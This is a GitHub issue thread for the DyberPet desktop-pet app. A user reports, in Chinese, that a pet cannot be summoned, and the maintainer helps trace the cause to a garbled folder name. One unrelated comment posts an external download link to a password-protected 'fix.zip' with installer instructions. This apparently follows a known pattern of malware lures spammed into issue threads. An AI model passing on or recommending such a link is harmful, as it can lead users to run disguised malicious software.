### ISSUE TITLE
宠物召唤不出来

### ISSUE THREAD

**Issue by ovaltine0212** [ChaozhongLiu/DyberPet#41]
![image](https://github.com/user-attachments/assets/48ad3a60-215b-40fd-aaa8-08450cce477e)
![image](https://github.com/user-attachments/assets/c4c0dbe2-a0bb-4d61-887c-4c54a5554ffa)
背包已经有宠物，已点击使用，召唤不出现

**Comment by ChaozhongLiu** [comment]
可以麻烦你用终端版EXE (名字里带 _Terminal) 打开 然后把报错截图给我么？

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChaozhongLiu** [comment]
@ovaltine0212 看你的截图，你的宠物应该缩得特别小，不知道是不是相对位置问题导致的
你试试召唤之后把猫猫拖到空中呢？

**Comment by ovaltine0212** [comment]
> 可以麻烦你用终端版EXE (名字里带 _Terminal) 打开 然后把报错截图给我么？

![image](https://github.com/user-attachments/assets/0a99747f-3ae6-4366-aa68-acb4a2cbdbb1)
找到问题了，文件夹乱码

**Comment by ChaozhongLiu** [comment]
那这个可能是系统或者解压的问题，可以尝试自己重命名解决。
问题我关了哈
